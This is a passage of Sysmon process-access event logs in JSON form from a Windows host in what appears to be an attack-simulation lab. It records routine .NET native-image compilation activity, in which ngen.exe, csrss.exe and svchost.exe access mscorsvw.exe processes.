.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7072,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.136\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-001057D30C00}\r\nTargetProcessId: 4604\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.136","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-001057D30C00}","TargetProcessId":"4604","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7073,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.136\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-001057D30C00}\r\nTargetProcessId: 4604\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.136","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-001057D30C00}","TargetProcessId":"4604","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7074,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.183\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-0010B4BA0E00}\r\nTargetProcessId: 1008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.183","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-0010B4BA0E00}","TargetProcessId":"1008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7075,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.183\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-0010B4BA0E00}\r\nTargetProcessId: 1008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.183","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-0010B4BA0E00}","TargetProcessId":"1008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7076,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.199\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-0010B4BA0E00}\r\nTargetProcessId: 1008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.199","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-0010B4BA0E00}","TargetProcessId":"1008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7077,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.246\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-0010BDBE0E00}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.246","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-0010BDBE0E00}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7078,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.246\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-0010BDBE0E00}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.246","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-0010BDBE0E00}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7079,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.246\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-0010BDBE0E00}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.246","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-0010BDBE0E00}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5